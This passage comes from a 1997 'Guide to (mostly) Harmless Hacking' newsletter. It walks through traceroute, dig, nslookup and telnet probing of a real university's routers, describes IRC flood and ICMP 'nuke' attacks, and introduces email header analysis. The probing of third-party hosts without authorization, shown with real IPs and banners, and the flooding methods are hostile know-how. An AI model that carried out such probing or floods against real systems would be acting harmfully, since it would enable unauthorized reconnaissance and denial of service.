numbers after that are the time in milliseconds it takes for each of three probe packets in a row to make that hop. When an * appears, the time for the hop timed out. In the case of this traceroute command, any time greater than 3 seconds causes an * to be printed out. How about hop 16? It gave us no info whatsoever. That silent gateway may be the result of a bug in the 4.1, 4.2 or 4.3BSD Unix network code. A computer running one of these operating systems sends an "unreachable" message. Or it could be something else. Sorry, I'm not enough of a genius yet to figure out this one for sure. Are we having phun yet? ************************ Evil genius tip: If you want to get really, truly excruciating detail on the traceroute command, while in your shell account type in the command: ->man traceroute I promise, on-line manual stuff is often written in a witty, entertaining fashion. Especially the Sun OS manual. Honest! ************************ ************************ Note for the shell-account-challenged: If you have Windows 95, you can get the same results -- I mean, for mapping the Internet, not going to jail -- using the "tracert" command. Here's how it works: 1. Open a PPP connection. For example, if you use Compuserve or AOL, make a connection, then minimize your on-line access program. 2. Click on the Start menu. 3. Open a DOS window. 4. At the DOS prompt type in "tracert where "distant.computer.com" is replaced by the name of the computer to which you want to trace a route. Press the Enter key. 5. Be patient. Especially if your are tracing a route to a distant computer, it takes awhile to make all the connections. Every time your computer connects to another computer on the Internet, it first has to trace a route to the other computer. That's why it sometimes take a long while for your browser to start downloading a Web page. 6. If you decide to use Windows for this hacking lesson, Damien Sorder has a message for us: "DON'T ENCOURAGE THEM TO USE WIN95!@#$!@#!" He's right, but since most of you reading this are consenting adults, I figure it's your funeral if you stoop to Windows hacking on an AOL PPP connection! *********************** Now this is getting interesting. We know that Daisy is directly connected to at least one other computer, and that computer in turn is connected to cisco-unp.und.ac.za. Let's learn a little something about this cisco-unp.und.ac.za, OK? First, we can guess from the name that is it a Cisco router. In fact, the first hop in this route is to a computer named "sisco," which is also probably a Cisco router. Since 85% of the routers in the world are Ciscos, that's a pretty safe bet. But we are going to not only make sure cisco-unp.und.ac.za is a Cisco. We are also going to find out the model number, and a few other goodies. First we try out whois: ->whois cisco-unp.und.ac.za No match for "CISCO-UNP.UND.AC.ZA". The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. Huh? Traceroute tells us cisco-unp.und.ac.za exists, but whois can't find it! Actually this is a common problem, especially trying to use whois on distant computers. What do we do next? Well, if you are lucky, the whereis command will turn up another incredibly cool program: dig! ********************** Newbie note: Dig stands for "domain information groper." It does a lot of the same things as nslookup. But dig is a much older program, in many ways harder to use than nslookup. For details on dig, use the command from your shell account "man dig." ********************** In fact, on my shell account I found I could run dig straight from my bash prompt: ->dig CISCO-UNP.UND.AC.ZA ; <<>> DiG 2.0 <<>> CISCO-UNP.UND.AC.ZA ;; res options: init recurs defnam dnsrch ;; got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 ;; flags: qr aa rd ra; Ques: 1, Ans: 4, Auth: 5, Addit: 5 ;; QUESTIONS: ;; CISCO-UNP.UND.AC.ZA, type = A, class = IN ;; ANSWERS: CISCO-UNP.UND.AC.ZA. 86400 A 146.230.248.1 CISCO-UNP.UND.AC.ZA. 86400 A 146.230.12.1 CISCO-UNP.UND.AC.ZA. 86400 A 146.230.60.1 CISCO-UNP.UND.AC.ZA. 86400 A 146.230.128.8 ;; AUTHORITY RECORDS: und.ac.za. 86400 NS Eagle.und.ac.za. und.ac.za. 86400 NS Shrike.und.ac.za. und.ac.za. 86400 NS ucthpx.uct.ac.za. und.ac.za. 86400 NS hiPPo.ru.ac.za. und.ac.za. 86400 NS Rain.psg.com. ;; ADDITIONAL RECORDS: Eagle.und.ac.za. 86400 A 146.230.128.15 Shrike.und.ac.za. 86400 A 146.230.128.13 ucthpx.uct.ac.za. 86400 A 137.158.128.1 hiPPo.ru.ac.za. 86400 A 146.231.128.1 Rain.psg.com. 14400 A 147.28.0.34 ;; Total query time: 516 msec ;; FROM: llama to SERVER: default -- 198.59.115.2 ;; WHEN: Fri Jan 17 13:03:49 1997 ;; MSG SIZE sent: 37 rcvd: 305 Ahhh, nice. The first few lines, the ones preceded by the ;; marks, mostly tell what the default settings of the command are and what we asked it. The line "Ques: 1, Ans: 4, Auth: 5, Addit: 5" tells us how many items we'll get under each topic of questions, answers, authority records, and additional records. (You will get different numbers on that line with different queries.) This "records" stuff refers to information stored under the domain name system. We learn from dig is that CLASS=IN, meaning CISCO-UNP.UND.AC.ZA is a domain name within the Internet. But we already knew that . The first really *new* thing we learn is that four routers all share the same domain name. We can tell that because their numerical Internet numbers are different. The reverse can also happen: several domain names can all belong to the same numerical address. If you use the dig command on each link in the route to DAISY.EE.UND.AC.ZA, you'll find a tremendous variation in whether the routers map to same or different domain names. As hackers, we want to get wise to all these variations in how domain names are associated with boxes. But we can still learn even more about that Cisco router named CISCO-UNP.UND.AC.ZA. We go back to nslookup and run it in interactive mode: ->/usr/etc/nslookup Default Server: swcp.com Address: 198.59.115.2 > Now let's do something new with nslookup. This is a command that comes in really, really handy when we're playing vigilante and need to persecute a spammer or bust a child porn Web site or two. Here's how we can get the email address for the sysadmin of an Internet host computer. > set type=soa Then I enter the name of the computer about which I am curious. Note that I put a period after the end of the host name. It often helps to do this with nslookup: > CISCO-UNP.UND.AC.ZA. Server: swcp.com Address: 198.59.115.2 *** No start of authority zone information is available for CISCO-UNP.UND.AC.ZA. Now what do I do? Give up? No, I'm a hacker wannabe, right? So I try entering just part of the domain name, again remembering to put a period at the end: > und.ac.za. Server: swcp.com Address: 198.59.115.2 und.ac.za origin = Eagle.und.ac.za mail addr = postmaster.und.ac.za serial=199610255, refresh=10800, retry=3600, expire=3000000, min=86400 Eagle.und.ac.za inet address = 146.230.128.15 Shrike.und.ac.za inet address = 146.230.128.13 ucthpx.uct.ac.za inet address = 137.158.128.1 hiPPo.ru.ac.za inet address = 146.231.128.1 Rain.psg.com inet address = 147.28.0.34 Bingo!!! I got the email address of a sysadmin whose domain includes that Cisco router, AND the IP addresses of some other boxes he or she administers. But notice it doesn't list any of those routers which the sysadmin undoubtedly knows a thing or two about. But we aren't done yet with cisco-unp.und.ac.za (146.230.128.8). Of course we have a pretty good guess that it is a Cisco router. But why stop with a mere guess when we can port surf? So we fall back on our friend the telnet program and head for port 2001: ->telnet 146.230.128.8 2001 Trying 146.230.128.8 ... Connected to 146.230.128.8. Escape character is '^]'. C **************************************************** *** Welcome to the University of Natal *** *** *** *** Model : Cisco 4500 with ATM and 8 BRI ports *** *** *** *** Dimension Data Durban - 031-838333 *** *** *** *************************************************** Hey, we know now that this is a Cisco model 4500 owned by the University of Natal, and we even got a phone number for the sysadmin. From this we also can infer that this router handles a subnet which serves the U of Natal and includes daisy. But why did I telnet to port 2001? It's in common use among routers as the administrative port. How do I know that? From the RFC (request for comments) that covers all commonly used port assignments. You can find a copy of this RFC at http://www.internic.net/help/domain/rfc1739.txt. Read it and you'll be in for some happy port surfing! ************************ Evil Genius tip: there are a bunch of ports used by Cisco routers: cisco-fna 130/tcp cisco FNATIVE cisco-tna 131/tcp cisco TNATIVE cisco-sys 132/tcp cisco SYSMAINT licensedaemon 1986/tcp cisco license management tr-rsrb-p1 1987/tcp cisco RSRB Priority 1 port tr-rsrb-p2 1988/tcp cisco RSRB Priority 2 port tr-rsrb-p3 1989/tcp cisco RSRB Priority 3 port stun-p1 1990/tcp cisco STUN Priority 1 port stun-p2 1991/tcp cisco STUN Priority 2 port stun-p3 1992/tcp cisco STUN Priority 3 port snmp-tcp-port 1993/tcp cisco SNMP TCP port stun-port 1994/tcp cisco serial tunnel port perf-port 1995/tcp cisco perf port tr-rsrb-port 1996/tcp cisco Remote SRB port gdp-port 1997/tcp cisco Gateway Discovery Protocol x25-svc-port 1998/tcp cisco X.25 service (XOT) tcp-id-port 1999/tcp cisco identification port ************************ But what about the "normal" telnet port, which is 23? Since it is the "normal" port, the one you usually go to when you want to log in, we don't need to put the 23 after the host name: ->telnet 146.230.128.8 Trying 146.230.128.8 ... Connected to 146.230.128.8. Escape character is '^]'. C ************************************************************************* *** Welcome to the University of Natal *** *** *** *** Model : Cisco 4500 with ATM and 8 BRI ports *** *** *** *** Dimension Data Durban - 031-838333 *** *** *** ************************************************************************* User Access Verification Password: Hey, this is interesting, no username requested, just a password. If I were the sysadmin, I'd make it a little harder to log in. Hmmm, what happens if I try to port surf finger that site? That means telnet to the finger port, which is 79: ->telnet 146.230.128.8 79 Trying 146.230.128.8 ... Connected to 146.230.128.8. Escape character is '^]'. C ************************************************************************* *** Welcome to the University of Natal *** *** *** *** Model : Cisco 4500 with ATM and 8 BRI ports *** *** *** *** Dimension Data Durban - 031-838333 *** *** *** ************************************************************************* Line User Host(s) Idle Location * 2 vty 0 idle 0 kitsune.swcp.com BR0:2 Sync PPP 00:00:00 BR0:1 Sync PPP 00:00:00 BR1:2 Sync PPP 00:00:00 BR1:1 Sync PPP 00:00:00 BR2:2 Sync PPP 00:00:01 BR2:1 Sync PPP 00:00:00 BR5:1 Sync PPP 00:00:00 Connection closed by foreign host. Notice that finger lists the connection to the computer I was port surfing from: kitsune. But no one else seems to be on line just now. Please remember, when you port surf, unless you know how to do IP spoofing, your target computer knows where you came from. Of course I will be a polite guest. Now let's try the obvious. Let's telnet to the login port of daisy. I use the numerical address just for the heck of it: ->telnet 146.230.192.18 Trying 146.230.192.18 ... Connected to 146.230.192.18. Escape character is '^]'. NetBSD/i386 (daisy.ee.und.ac.za) (ttyp0) login: Hey, this is interesting. Since we now know this is a university, that's probably the electrical engineering (EE) department. And NetBSD is a freeware Unix that runs on a PC! Probably a 80386 box. Getting this info makes me almost feel like I've been hanging out at the University of Natal EE computer lab. It sounds like a friendly place. Judging from their router, security is somewhat lax, they use cheap computers, and messages are friendly. Let's finger and see who's logged in just now: Since I am already in the telnet program (I can tell by the prompt "telnet>"), I go to daisy using the "open" command: telnet> open daisy.ee.und.ac.za 79 Trying 146.230.192.18 ... telnet: connect: Connection refused telnet> quit Well, that didn't work, so I exit telnet and try the finger program on my shell account computer: ->finger @daisy.ee.und.ac.za [daisy.ee.und.ac.za] finger: daisy.ee.und.ac.za: Connection refused Sigh. It's hard to find open finger ports any more. But it's a good security practice to close finger. Damien Sorder points out, "If you install the new Linux distributions, it comes with Cfingerd. Why would I (and others) want to shut it down? Not because of hackers and abuse or some STUPID S*** like that. Because it gives out way too much information when you finger a single user. You get machine load and all the user information." I manage to pull up a little more info on how to map the interconnections of University of Natal computers with an search of the Web using http://digital.altavista.com. It links me to the site http://www.frd.ac.za/uninet/sprint.html, which is titled "Traffic on the UNINET-SPRINTLINK Link." However, all the links to netwrok traffic statistics from that site are dead. Next, let's look into number 20 on that traceroute that led us to the University of Natal. You can pretty much expect that links in the middle of a long traceroute will be big computers owned by the bigger companies that form the backbone of the Internet. ->telnet 155.232.82.2 2001 Trying 155.232.82.2 ... Connected to 155.232.82.2. Escape character is '^]'. Id: und02 Authorised Users Only! ------------------------ User Access Verification Username: Yup, we're out of friendly territory now. And since port 2001 works, it may be a router. Just for laughs, though, let's go back to the default telnet port: ->telnet 155.232.82.2 Trying 155.232.82.2 ... Connected to 155.232.82.2. Escape character is '^]'. Id: und02 Authorised Users Only! ------------------------ User Access Verification Username: Now just maybe this backbone-type computer will tell us gobs of stuff about all the computers it is connected to. We try telneting to the netstat port, 15. This, if it happens to be open to the public, will tell us all about the computers that connect through it: ->telnet 155.232.82.2 15 Trying 155.232.82.2 ... telnet: connect: Connection refused Sigh. I gave an example of the incredible wealth of information you can get from netstat on the GTMHH on port surfing. But every day it is harder to find a public netstat port. That's because the information netstat gives is so useful to computer criminals. In fact, port 15 is no longer reserved as the netstat port (as of 1994, according to the RFC). So you will find few boxes using it. ****************************** Newbie note: want to know what port assignments your ISP uses? Sorder points out " /etc/services on most machines will [tell you this]." How can you can read that information? Try this: First, change to the /etc/ directory: ->cd /etc Then command it to print it out to your screen with: ->more services # # @(#)services 1.16 90/01/03 SMI # # Network services, Internet style # This file is never consulted when the NIS are running # tcpmux 1/tcp # rfc-1078 echo 7/tcp ... and so on... Alas, just because your shell account has a list of port assignments doesn't mean they are actually in use. It also probably won't list specialized services like all those Cisco router port assignments. ************************* In fact, after surfing about two dozen somewhat randomly chosen netstat ports, the only answer I get other than "Connection refused" is: ->telnet ns.nmia.com 15 Trying 198.59.166.10 ... Connected to ns.nmia.com. Escape character is '^]'. Yes, but will I see the EASTER BUNNY in skintight leather at an IRON MAIDEN concert? Now what about all those Sprintlink routers in that traceroute? That's a major Internet backbone based in the US provided by Sprint. You can get some information on the topology of the Sprintlink backbone at http://www.sprintlink.net/SPLK/HB21.html#2.2. Alas, Sprintlink used to give out much more information than they do today. All I can pick up on their Web site today is pretty vague. Sigh. The Internet is getting less friendly, but more secure. Some day when we're really ancient, say five years from now, we'll be telling people, "Why, I remember when we could port surf! Why, there used to be zillions of open ports and people could choose ANY password they wanted. Hmph! Today it's just firewalls everywhere you look!" Adds Sorder, "Gee. How do you think people like me feel.. port surfing over 6 years ago." Our thanks to Damien Sorder (jericho@dimensional.com) for assistance in reviewing and contributing to this GTMHH. _________________________________________________________ Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe. Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking! Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.. ________________________________________________________ ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 Number 3 How to keep from getting kicked off IRC! ____________________________________________________________ Our thanks to Patrick Rutledge, Warbeast, Meltdown and k1neTiK, who all provided invaluable information on the burning question of the IRC world: help, they're nuking meee... What's the big deal about IRC and hackers? Sheesh, IRC is sooo easy to use... until you get on a server where hacker wars reign. What the heck do you do to keep from getting clobbered over and over again? Of course you could just decide your enemies can go to heck. But let's say you'd rather hang in there. You may want to hang in there because if you want to make friends quickly in the hacker world, one of the best ways is over Internet Relay Chat (IRC). On IRC a group of people type messages back and forth on a screen in almost real time. It can be more fun than Usenet where it can take from minutes to hours for people's replies to turn up. And unlike Usenet, if you say something you regret, it's soon gone from the screen. Ahem. That is, it will soon be gone if no one is logging the session. In some ways IRC is like CB radio, with lots of folks flaming and making fools of themselves in unique and irritating ways. So don't expect to see timeless wisdom and wit scrolling down your computer screen. But because IRC is such an inexpensive way for people from all over the world to quickly exchange ideas, it is widely used by hackers. Also, given the wars you can fight for control of IRC channels, it can give you a good hacker workout. To get on IRC you need both an IRC client program and you need to connect to a Web site or Internet Service Provider (ISP) that is running an IRC server program. *********************** Newbie note: Any program that uses a resource is called a "client." Any program that offers a resource is a "server." Your IRC client program runs on either your home computer or shell account computer and connects you to an IRC server program which runs on a remote computer somewhere on the Internet. *********************** You may already have an IRC server running on your ISP. Customer service at your ISP should be able to help you with instructions on how to use it. Even easier yet, if your Web browser is set up to use Java, you can run IRC straight from your browser once you have surfed into a Web-based IRC server. Where are good IRC servers for meeting other hackers? There are several IRC servers that usually offer hacker channels. EFNet (Eris-Free Network)links many IRC servers. It was originally started by the Eris FreeNet (ef.net). It is reputed to be a "war ground" where you might get a chance to really practice the IRC techniques we cover below. Undernet is one of the largest networks of IRC servers. The main purpose of Undernet is to be a friendly place with IRC wars under control. But this means, yes, lots of IRC cops! The operators of these IRC servers have permission to kill you not only from a channel but also from a server. Heck, they can ban you for good. They can even ban your whole domain. ************************************ Newbie note: A domain is the last two (or sometimes three or four) parts of your email address. For example, aol.com is the domain name for America Online. If an IRC network were to ban the aol.com domain, that would mean every single person on America Online would be banned from it. ************************************ ************************************ You can get punched in the nose warning: If the sysadmins at your ISP were to find out that you had managed to get their entire domain banned from an IRC net on account of committing ICMP bombing or whatever, they will be truly mad at you! You will be lucky if the worst that happens is that you lose your account. You'd better hope that word doesn't get out to all the IRC addicts on your ISP that you were the dude that got you guys all kicked out. ************************************ IRCNet is probably the same size if not larger than Undernet. IRCNet is basically the European/Australian split off from the old EFNet. Yes, IRC is a world-wide phenomenon. Get on the right IRC network and you can be making friends with hackers on any continent of the planet. There are at least 80 IRC networks in existence. To learn how to contact them, surf over to: http://www.irchelp.org/. You can locate additional IRC servers by surfing over to http://hotbot.com or http://digital.altavista.com and searching for "IRC server." Some IRC servers are ideal for the elite hacker, for example the l0pht server. Note that is a "zero" not an "O" in l0pht. **************************************** Evil genius tip: Get on an IRC server by telneting straight in through port 6667 at the domain name for that server. **************************************** But before you get too excited over trying out IRC, let us warn you. IRC is not so much phun any more because some d00dz aren't satisfied with using it to merely say naughty words and cast aspersions on people's ancestry and grooming habits. They get their laughs by kicking other people off IRC entirely. This is because they are too chicken to start brawls in bars. So they beat up on people in cyberspace where they don't have to fret over getting ouchies. But we're going to show some simple, effective ways to keep these lusers from ruining your IRC sessions. However, first you'll need to know some of the ways you can get kicked off IRC by these bullies. The simplest way to get in trouble is to accidentally give control of your IRC channel to an impostor whose goal is to kick you and your friends off. You see, the first person to start up a channel on an IRC server is automatically the operator (OP). The operator has the power to kick people off or invite people in. Also, if the operator wants to, he or she may pass operator status on to someone else. Ideally, when you leave the channel you would pass this status on to a friend your trust. Also, maybe someone who you think is your good buddy is begging you to please, please give him a turn being the operator. You may decide to hand over the OP to him or her in order to demonstrate friendship. But if you mess up and accidentally OP a bad guy who is pretending to be someone you know and trust, your fun chat can become history. One way to keep this all this obnoxious stuff from happening is to simply not OP people you do not know. But this is easier said than done. It is a friendly thing to give OP to your buddies. You may not want to appear stuck up by refusing to OP anyone. So if you are going to OP a friend, how can you really tell that IRC dude is your friend? Just because you recognize the nick (nickname), don't assume it's who you think it is! Check the host address associated with the nick by giving the command "/whois IRCnick" where "IRCnick" is the nickname of the person you want to check. This "/whois" command will give back to you the email address belonging to the person using that nick. If you see, for example, "d***@wannabe.net" instead of the address you expected, say friend@cool.com, then DO NOT OP him. Make the person explain who he or she is and why the email address is different. But entering a fake nick when entering an IRC server is only the simplest of ways someone can sabotage an IRC session. Your real trouble comes when people deploy "nukes" and "ICBMs" against you. "Nuking" is also known as "ICMP Bombing." This includes forged messages such as EOF (end of file), dead socket, redirect, etc. ************************************** Newbie note: ICMP stands for Internet Control Message Protocol. This is an class of IRC attacks that go beyond exploiting quirks in the IRC server program to take advantage of major league hacking techniques based upon the way the Internet works. ************************************** ************************************** You can go to jail warning: ICMP attacks constitute illegal denial of service attacks. They are not just harmless harassment of a single person on IRC, but may affect an entire Internet host computer, disputing service to all who are using it. *************************************** For example, ICMP redirect messages are used by routers to tell other computers "Hey, quit sending me that stuff. Send it to routerx.foobar.net instead!" So an ICMP redirect message could cause your IRC messages to go to bit heaven instead of your chat channel. EOF stands for "end of file." "Dead socket" refers to connections such as your PPP session that you would be using with many IRC clients to connect to the Internet. If your IRC enemy spoofs a message that your socket is dead, your IRC chat session can't get any more input from you. That's what the program "ICMP Host Unreachable Bomber for Windows" does. Probably the most devastating IRC weapon is the flood ping, known as "ICBM flood or ICMPing." The idea is that a bully will find out what Internet host you are using, and then give the command "ping-f" to your host computer. Or even to your home computer. Yes, on IRC it is possible to identify the dynamically assigned IP address of your home computer and send stuff directly to your modem! If the bully has a decent computer, he or she may be able to ping yours badly enough to briefly knock you out of IRC. Then this character can take over your IRC session and may masquerade as you. ********************** Newbie note: When you connect to the Internet with a point-to-point (PPP) connection, your ISP's host computer assigns you an Internet Protocol (IP) address which may be different every time you log on. This is called a "dynamically assigned IP address." In some cases, however, the ISP has arranged to assign the uses the same IP address each time. ********************** Now let's consider in more detail the various types of flooding attacks on IRC. The purpose of flooding is to send so much garbage to a client that its connection to the IRC server either becomes useless or gets cut off. Text flooding is the simplest attack. For example, you could just hold down the "x" key and hit enter from time to time. This would keep the IRC screen filled with your junk and scroll the others' comments quickly off the screen. However, text flooding is almost always unsuccessful because almost any IRC client (the program you run on your computer) has text flood control. Even if it doesn't, text must pass through an IRC server. Most IRC servers also have text flood filters. Because text flooding is basically harmless, you are unlikely to suffer anything worse than getting banned or possibly K:lined for doing it. ****************************************** Newbie note: "K:line" means to ban not just you, but anyone who is in your domain from an IRC server. For example, if you are a student at Giant State University with an email address of IRCd00d@giantstate.edu, then every person whose email address ends with "giantstate.edu" will also be banned. ******************************************* Client to Client Protocol (CTCP) echo flooding is the most effective type of flood. This is sort of like the ping you send to determine whether a host computer is alive. It is a command used within IRC to check to see if someone is still on your IRC channel. How does the echo command work? To check whether someone is still on your IRC channel, give the command "/ctcp nick ECHO hello out there!" If "nick" (where "nick" is the IRC nickname of the person you are checking out) is still there, you get back "nick HELLO OUT THERE." What has happened is that your victim's IRC client program has automatically echoed whatever message you sent. But someone who wants to boot you off IRC can use the CTCP echo command to trick your IRC server into thinking you are hogging the channel with too much talking. This is because most IRC servers will automatically cut you off if you try text flooding. So CTCP echo flooding spoofs the IRC into falsely cutting someone off by causing the victim's IRC client to automatically keep on responding to a whole bunch of echo requests. Of course your attacker could also get booted off for making all those CTCP echo requests. But a knowledgeable attacker will either be working in league with some friends who will be doing the same thing to you or else be connected with several different nicks to that same IRC server. So by having different versions of him or herself in the form of software bots making those CTCP echo requests, the attacker stays on while the victim gets booted off. This attack is also fairly harmless, so people who get caught doing this will only get banned or maybe K:lined for their misbehavior. ****************************** Newbie note: A "bot" is a computer program that acts kind of like a robot to go around and do things for you. Some bots are hard to tell from real people. For example, some IRC bots wait for someone to use bad language and respond to these naughty words in annoying ways. ************************************* ************************************* You can get punched in the nose warning: Bots are not permitted on the servers of the large networks. The IRC Cops who control hacker wars on these networks love nothing more than killing bots and banning the botrunners that they catch. ************************************** A similar attack is CATCH ping. You can give the command "/ping nick" and the IRC client of the guy using that nick would respond to the IRC server with a message to be passed on to the guy who made the ping request saying "nick" is alive, and telling you how long it took for nick's IRC client program to respond. It's useful to know the response time because sometimes the Internet can be so slow it might take ten seconds or more to send an IRC message to other people on that IRC channel. So if someone seems to be taking a long time to reply to you, it may just be a slow Internet. Your attacker can also easily get the dynamically assigned IP (Internet protocol) address of your home computer and directly flood your modem. But just about every Unix IRC program has at least some CATCH flood protection in it. Again, we are looking at a fairly harmless kind of attack. So how do you handle IRC attacks? There are several programs that you can run with your Unix IRC program. Examples are the programs LiCe and Phoenix. These scripts will run in the background of your Unix IRC session and will automatically kick in some sort of protection (ignore, ban, kick) against attackers. If you are running a Windows-based IRC client, you may assume that like usual you are out of luck. In fact, when I first got on an IRC channel recently using Netscape 3.01 running on Win 95, the *first* thing the denizens of #hackers did was make fun of my operating system. Yeah, thanks. But in fact there are great IRC war programs for both Windows 95 and Unix. For Windows 95 you may wish to use the mIRC client program. You can download it from http://www.super-highway.net/users/govil/mirc40.html. It includes protection from ICMP ping flood. But this program isn't enough to handle all the IRC wars you may encounter. So you may wish to add the protection of the most user-friendly, powerful Windows 95 war script around: 7th Sphere. You can get it from http://www.localnet.com/~marcraz/. If you surf IRC from a Unix box, you'll want to try out IRCII. You can download it from ftp.undernet.org , in the directory /pub/irc/clients/unix, or http://www.irchelp.org/, or ftp://cs-ftp.bu.edu/irc/. For added protection, you may download LiCe from ftp://ftp.cibola.net/pub/irc/scripts. Ahem, at this same site you can also download the attack program Tick from /pub/irc/tick. But if you get Tick, just remember our "You can get punched in the nose" warning! ********************************* Newbie note: For detailed instructions on how to run these IRC programs, see At http://www.irchelp.org/. Or go to Usenet and check out alt.irc.questions ********************************* ********************************* Evil genius tip: Want to know every excruciating technical detail about IRC? Check out RFC 1459 (The IRC protocol). You can find many copies of this ever popular RFC (Request for Comments) by doing a Web search. ******************************** Now let's suppose you are all set up with an industrial strength IRC client program and war scripts. Does this mean you are ready to go to war on IRC? Us Happy Hacker folks don't recommend attacking people who take over OP status by force on IRC. Even if the other guys start it, remember this. If they were able to sneak into the channel and get OPs just like that, then chances are they are much more experienced and dangerous than you are. Until you become an IRC master yourself, we suggest you do no more than ask politely for OPs back. Better yet, "/ignore nick" the l00zer and join another channel. For instance, if #evilhaxorchat is taken over, just create #evilhaxorchat2 and "/invite IRCfriend" all your friends there. And remember to use what you learned in this Guide about the IRC whois command so that you DON'T OP people unless you know who they are. As Patrick Rutledge says, this might sound like a wimp move, but if you don't have a fighting chance, don't try - it might be more embarrassing for you in the long run. And if you start IRC warrioring and get K:lined off the system, just think about that purple nose and black eye you could get when all the other IRC dudes at your ISP or school find out who was the luser who got everyone banned. That's it for now. Now don't try any funny stuff, OK? Oh, no, they're nuking meee... ____________________________________________________________ Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe" Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking! Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. ________________________________________________________ ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol 3 Number 4 How to Read Email Headers and Find Internet Hosts Warning: flamebait enclosed! ____________________________________________________________ OK, OK, you 31337 haxors win. I'm finally releasing the next in our series of Guides oriented toward the intermediate hacker. Now some of you may think that headers are too simple or boring to waste time on. However, a few weeks ago I asked the 3000+ readers of the Happy Hacker list if anyone could tell me exactly what email tricks I was playing in the process of mailing out the Digests. But not one person replied with a complete answer -- or even 75% of the answer -- or even suspected that for months almost all Happy Hacker mailings have doubled as protests. The targets: ISPs offering download sites for email bomber programs. Conclusion: it is time to talk headers! In this Guide we will learn: · what is a header · why headers are fun · how to see full headers · what all that stuff in your headers means · how to get the names of Internet host computers from your headers · the foundation for understanding the forging of email and Usenet posts, catching the people who forge headers, and the theory behind those email bomber programs that can bring an entire Internet Service Provider (ISP) to its knees This is a Guide you can make at least some use of without getting a shell account or installing some form of Unix on your home computer. All you need is to be able to send and receive email, and you are in business. However, if you do have a shell account, you can do much more with deciphering headers. Viva Unix! Headers may sound like a boring topic. Heck, the Eudora email program named the button you click to read full headers "blah blah blah." But all those guys who tell you headers are boring are either ignorant -- or else afraid you'll open a wonderful chest full of hacker insights. Yes, every email header you check out has the potential to unearth a treasure hidden in some back alley of the Internet. Now headers may seem simple enough to be a topic for one of our Beginners' Series Guides. But when I went to look up the topic of headers in my library of manuals, I was shocked to find that most of them don't even cover the topic. The two I found that did cover headers said almost nothing about them. Even the relevant RFC 822 is pretty vague. If any of you super-vigilant readers looking for flame bait happen to know of any literature that *does* cover headers in detail, please include that information in your tirades! ********************************************* Technical tip: Information relevant to headers may be extracted from Requests for Comments (RFCs) 822 (best), as well as 1042, 1123, 1521 and 1891 (not a complete list). To read them, take your Web browser to http://altavista.digital.com and search for "RFC 822" etc. ********************************************* Lacking much help from manuals, and finding that RFC 822 didn't answer all my questions, the main way I researched this article was to send email back and forth among some of my accounts, trying out many variations in order to see what kinds of headers they generated. Hey, that's how real hackers are supposed to figure out stuff when RTFM (read the fine manual) or RTFRFC (read the fine RFC)doesn't tell us as much as we want to know. Right? One last thing. People have pointed out to me that every time I put an email address or domain name in a Guide to (mostly) Harmless Hacking, a zillion newbies launch botched hacking attacks against these. All email addresses and domain names below have been fubarred. ************************************************ Newbie note: The verb "to fubar" means to obscure email addresses and Internet host addresses by changing them. Ancient tradition holds that it is best to do so by substituting "foobar" or "fubar" for part of the address. ************************************************ WHAT ARE HEADERS? If you are new to hacking, the headers you are used to seeing may be incomplete. Chances are that when you get email it looks something like this: From: Vegbar Fubar Date: Fri, 11 Apr 1997 18:09:53 GMT To: hacker@techbroker.com But if you know the right command, suddenly, with this same email message, we are looking at tons and tons of stuff: Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400 Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400 Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id for ; Fri, 11 Apr 1997 20:09:56 +0200 From: Vegbar Fubar Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT Date: Fri, 11 Apr 1997 18:09:53 GMT Message-Id: <199704111809.13156.gyllir@ifi.foobar.no> To: hacker@techbroker.com Hey, have you ever wondered why all that stuff is there and what it means? We'll return to this example later in this tutorial. But first we must consider the burning question of the day: WHY ARE HEADERS FUN? Why bother with those "blah blah blah" headers? They are boring, right? Wrong! 1) Ever hear a wannabe hacker complaining he or she doesn't have the addresses of any good computers to explore? Have you ever used one of those IP scanner programs that find valid Internet Protocol addresses of Internet hosts for you? Well, you can find gazillions of valid addresses without the crutch of one of these programs simply by reading the headers of emails. 2) Ever wonder who really mailed that "Make Money Fast" spam? Or who is that klutz who email bombed you? The first step to learning how to spot email forgeries and spot the culprit is to be able to read headers. 3) Want to learn how to convincingly forge email? Do you aspire to write automatic spam or email bomber programs? (I disapprove of spammer and email bomb programs, but let's be honest about the kinds of knowledge their creators must draw upon.) The first step is to understand headers. 4) Want to attack someone's computer? Find out where best to attack from the headers of their email. I disapprove of this use, too. But I'm dedicated to telling you the truth about hacking, so like it or not, here it is. HOW CAN YOU SEE FULL HEADERS? So you look at the headers of your email and it doesn't appear have any good stuff whatsoever. Want to see all the hidden stuff? The way you do this depends on what email program you are using. The most popular email program today is Eudora. To see full headers in Eudora, just click the "blah, blah, blah" button on the far left end of the tool bar. The Netscape web browser includes an email reader. To see full headers, click on Options, then click the "Show All Headers" item. 